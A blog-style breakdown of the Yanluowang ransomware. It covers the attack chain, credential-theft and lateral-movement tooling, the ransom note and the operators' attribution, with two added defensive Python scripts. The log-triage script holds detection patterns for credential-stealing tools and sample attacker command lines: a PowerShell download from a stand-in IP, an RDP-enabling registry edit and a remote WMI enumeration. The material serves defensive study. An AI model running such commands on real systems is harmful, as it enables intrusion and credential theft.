Yanluo wang Ransomware breakdown

Smith3dx
5 min read · Dec 5, 2021

Who is Yanluo Wang

Yanluo Wang is a deity of Chinese religion and one of the official judges of Youdu, the underworld. According to legend he is often equated with Yama (Buddhism), but Yanluo Wang has his own body of stories and has long been worshipped in China. He is always depicted as male, holding a brush and a book that lists the death date of everyone.

Yanluo wang ransomware discovery

Researchers have discovered a newly developed ransomware variant called Yanluowang that targets high-profile enterprises. It was discovered during an incident at an unnamed large organization, after suspicious activity involving the legitimate AdFind command-line Active Directory query tool was detected. Threat actors commonly use AdFind for reconnaissance, including gathering the information needed to move laterally through their victims’ networks.

How Yanluo wang ransomware works

The attackers attempted to deploy their ransomware payloads across the breached organization’s systems within days of the researchers discovering the suspicious AdFind tool. Before deploying the ransomware on compromised devices, the operators run a precursor tool that performs the following actions:

  • Creates a .txt file with the number of remote machines to check, as given on the command line
  • Uses Windows Management Instrumentation (WMI) to get a list of the processes running on the remote machines listed in the .txt file
  • Logs all process and remote machine names to processes.txt

Figure 1. Yanluowang ends the SQL and Veeam processes before encryption

Figure 2. Yanluowang uses the Windows API for encryption

Once the precursor tool has run, the ransomware halts the hypervisor’s virtual machines, terminates the processes harvested by the precursor tool (including SQL and Veeam), and encrypts files, appending the “.yanluowang” extension. The Yanluowang group leaves a README.txt ransom note on the encrypted system warning victims not to contact law enforcement or ransomware negotiation companies.
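The two on-disk artifacts described above, the “.yanluowang” extension and the README.txt note, are the cheapest signals for a responder to sweep a file share for. The following is an added example written for this breakdown, not code from the ransomware, the researchers or any vendor: it walks a directory tree, counts renamed files, and treats a README.txt as a ransom note only when at least two phrases the article attributes to the note (law enforcement, negotiation, the extension itself) appear in it, so ordinary project README files are not flagged. The sample tree it builds in a temporary directory is constructed for the demonstration.

```python
"""Scan a directory tree for the on-disk artifacts the article attributes to
Yanluowang: files carrying the ".yanluowang" extension and README.txt ransom
notes. Added illustration; not the ransomware's or any vendor's code."""
import os
import re
import tempfile
from dataclasses import dataclass, field

ENCRYPTED_EXT = ".yanluowang"   # extension appended to encrypted files (from the article)
NOTE_NAME = "readme.txt"        # ransom note file name (from the article)

# Phrases the article says the note contains; the exact wording is an assumption,
# so a README.txt is treated as a note only when at least two phrases match.
NOTE_PATTERNS = [
    re.compile(r"law enforcement", re.I),
    re.compile(r"negotiat", re.I),
    re.compile(r"\.yanluowang", re.I),
]
MIN_PATTERN_HITS = 2


@dataclass
class ScanReport:
    encrypted_files: list = field(default_factory=list)
    ransom_notes: list = field(default_factory=list)

    @property
    def compromised(self) -> bool:
        return bool(self.encrypted_files or self.ransom_notes)


def looks_like_ransom_note(path: str) -> bool:
    """Read the head of a README.txt and score it against the note phrases."""
    try:
        with open(path, "r", errors="ignore") as fh:
            text = fh.read(4096)
    except OSError:
        return False          # unreadable file: not evidence either way
    return sum(1 for p in NOTE_PATTERNS if p.search(text)) >= MIN_PATTERN_HITS


def scan_tree(root: str) -> ScanReport:
    """Walk root and collect encrypted files and ransom notes."""
    report = ScanReport()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            lowered = name.lower()
            if lowered.endswith(ENCRYPTED_EXT):
                report.encrypted_files.append(full)
            elif lowered == NOTE_NAME and looks_like_ransom_note(full):
                report.ransom_notes.append(full)
    return report


def build_sample_tree(root: str) -> None:
    """Constructed layout: two renamed files, one ransom note, one benign README."""
    finance = os.path.join(root, "share", "finance")
    os.makedirs(finance, exist_ok=True)
    for fname in ("q3.xlsx.yanluowang", "budget.docx.yanluowang"):
        with open(os.path.join(finance, fname), "wb") as fh:
            fh.write(os.urandom(32))           # stand-in for ciphertext
    with open(os.path.join(root, "share", "README.txt"), "w") as fh:
        fh.write("Your files are encrypted with .yanluowang.\n"
                 "Do not contact law enforcement or negotiation companies.\n")
    with open(os.path.join(finance, "README.txt"), "w") as fh:
        fh.write("Quarterly reporting folder. Ask the finance team for access.\n")


def run_demo() -> ScanReport:
    """Build the constructed tree in a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    rep = run_demo()
    print(f"encrypted files: {len(rep.encrypted_files)}, ransom notes: {len(rep.ransom_notes)}")
```

Point `scan_tree` at a mounted share or a forensic image to get a quick count of affected files and the location of the notes; the two-phrase threshold is deliberately conservative so that the sweep does not page on developer README files.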

Figure 3. Yanluowang ransom note

Lateral Movement

In most cases, PowerShell is used to download tools, including BazarLoader, to compromised systems to assist in reconnaissance. The attackers then enable RDP via the registry to allow remote access. After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.

In order to perform lateral movement and identify systems of interest, such as the victim’s Active Directory server, the attackers deploy AdFind, a free tool that can be used to query Active Directory, and SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.

The next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools, including:

  • GrabFF: A tool that can dump passwords from Firefox
  • GrabChrome: A tool that can dump passwords from Chrome
  • BrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers

Along with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script to copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping tools were also observed (secretsdump.exe). Credentials were also dumped from the registry.

In addition, the attackers have also used a number of other data capture tools, including a screen capture tool and a file exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted organization.

Other tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled infrastructure, and the free, Chromium-based Cent web browser.
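Almost everything in the precursor-tool description and in this Lateral Movement section shows up as a process creation on an endpoint, so a small triage script over process-creation logs is the most direct way to turn the article into a detection. The block below is an added example written for this breakdown, not a vendor rule or the researchers’ code. The tool names come from the article; the log line format, the sample log lines (with a 203.0.113.0/24 documentation address) and the command-line shapes for the behaviours the article only describes in prose (`wmic /node:` for the precursor tool’s remote WMI process listing, the `fDenyTSConnections` registry value for enabling RDP, and PowerShell download cmdlets for tool staging) are assumptions. Its main point is the last function: a single host that spans discovery, credential theft and remote access, as the described intrusion does, deserves far more attention than any single hit.

```python
"""Triage process-creation log lines for the tooling and behaviours the article
attributes to the Yanluowang operators. Added illustration: the log format, the
command-line regexes and the sample lines are assumptions, not vendor telemetry."""
import re
from collections import Counter, defaultdict

# Tool names taken from the article, keyed by the phase the article places them in.
TOOL_PHASES = {
    "adfind.exe": "discovery",          # AD query tool that started the investigation
    "netscan.exe": "discovery",         # SoftPerfect Network Scanner
    "screenconnect": "remote-access",   # ConnectWise (formerly ScreenConnect)
    "grabff": "credential-theft",       # Firefox password dump
    "grabchrome": "credential-theft",   # Chrome password dump
    "browserpassview": "credential-theft",
    "keethief": "credential-theft",     # KeePass master key copy
    "secretsdump.exe": "credential-theft",
    "filegrab.exe": "collection",       # file exfiltration tool
    "proxifierpe": "c2-proxy",          # proxying back to attacker infrastructure
}

# Behaviours the article describes only in prose. How each appears on a command
# line is an assumption made for this example.
BEHAVIOUR_PATTERNS = [
    ("wmic-remote-node", re.compile(r"\bwmic(?:\.exe)?\s+/node:", re.I), "precursor-wmi-enum"),
    ("rdp-registry-enable", re.compile(r"fDenyTSConnections\b.*\s/d\s+0\b", re.I), "rdp-enable"),
    ("powershell-download",
     re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I),
     "powershell-download"),
]

# Assumed log line shape: "<timestamp> host=<name> user=<name> cmd="<command line>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$'
)


def classify(cmd):
    """Return [(indicator, phase), ...] for every indicator matched in one command line."""
    lower = cmd.lower()
    hits = [(name, phase) for name, phase in TOOL_PHASES.items() if name in lower]
    hits += [(label, phase) for label, pat, phase in BEHAVIOUR_PATTERNS if pat.search(cmd)]
    return hits


def triage(lines):
    """Parse log lines and keep only those carrying at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue          # unparsable line: skip rather than abort the triage
        hits = classify(m["cmd"])
        if hits:
            findings.append({**m.groupdict(), "hits": hits})
    return findings


def phase_counts(findings):
    """How many indicator hits fall into each phase."""
    return Counter(phase for f in findings for _, phase in f["hits"])


def hosts_spanning_phases(findings, minimum=3):
    """Hosts on which at least `minimum` distinct phases were seen. The intrusion in
    the article chained discovery, credential theft and remote access on victim
    systems, so one host showing several phases outranks any single hit."""
    phases_by_host = defaultdict(set)
    for f in findings:
        phases_by_host[f["host"]].update(phase for _, phase in f["hits"])
    return sorted(h for h, p in phases_by_host.items() if len(p) >= minimum)


# Constructed sample log (not real telemetry).
SAMPLE_LOG = [
    r'2021-11-29T09:12:03Z host=WS042 user=jdoe cmd="powershell.exe -c Invoke-WebRequest -Uri http://203.0.113.7/tool.exe -OutFile C:\Users\Public\tool.exe"',
    r'2021-11-29T09:13:40Z host=WS042 user=jdoe cmd="reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f"',
    r'2021-11-29T09:15:02Z host=WS042 user=jdoe cmd="C:\Tools\AdFind.exe -f (objectcategory=computer) name"',
    r'2021-11-29T09:16:30Z host=WS042 user=jdoe cmd="C:\Tools\netscan.exe"',
    r'2021-11-29T09:18:11Z host=WS042 user=jdoe cmd="wmic /node:@hosts.txt process get name,processid"',
    r'2021-11-29T09:20:00Z host=SRV01 user=SYSTEM cmd="C:\Windows\System32\svchost.exe -k netsvcs"',
    r'2021-11-29T09:31:45Z host=WS042 user=jdoe cmd="C:\Users\Public\secretsdump.exe"',
    r'2021-11-29T09:40:12Z host=FS01 user=jdoe cmd="C:\Users\Public\filegrab.exe"',
    r'2021-11-29T09:44:09Z host=WS042 user=jdoe cmd="msiexec /i ScreenConnect.ClientSetup.msi /quiet"',
    r'2021-11-29T09:50:00Z host=WS042 user=jdoe cmd="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"',
    r'2021-11-29T09:55:33Z host=WS042 user=jdoe cmd="powershell.exe -File KeeThief.ps1"',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["host"], [phase for _, phase in f["hits"]])
    print("phase counts:", dict(phase_counts(found)))
    print("hosts spanning 3+ phases:", hosts_spanning_phases(found))
```

The name matches are deliberately loose (`adfind.exe` anywhere in the command line), which is the right trade-off for a retrospective sweep after the AdFind sighting that opened the investigation; for an always-on rule you would want to match on the image path or hash, since attackers rename these tools as readily as they download them.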

Threat from Bad actors

“If the attackers’ rules are broken the ransomware operators say they will conduct distributed denial of service (DDoS) attacks against the victim, as well as make ‘calls to employees and business partners’,” the Broadcom researchers added.

“The criminals also threaten to repeat the attack ‘in a few weeks’ and delete the victim’s data,” a common tactic used by most ransomware gangs to pressure their victims into paying the ransom.

Likely Threat actor using Yanluowang

A threat actor previously tied to the Thieflock ransomware operation may now be using the emerging Yanluowang ransomware in a series of attacks against U.S. corporations, researchers have found. The attacker uses a number of tactics, techniques, and procedures (TTPs) that were previously linked to Thieflock ransomware attacks, suggesting that they may have been a Thieflock affiliate who shifted allegiances to the new Yanluowang ransomware family.

The attackers have been heavily focused on organizations in the financial sector but have also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.

There is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, a ransomware-as-a-service developed by the Canthroid (aka Fivehands) group. Several TTPs used by these attackers overlap with TTPs used in Thieflock attacks, including:

  • Use of custom password recovery tools such as GrabFF and other open-source password dumping tools
  • Use of open-source network scanning tools (SoftPerfect Network Scanner)
  • Use of free browsers, such as s3browser and Cent browser

This link raises the question of whether Yanluowang was developed by Canthroid. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks are carried out by a former Thieflock affiliate.
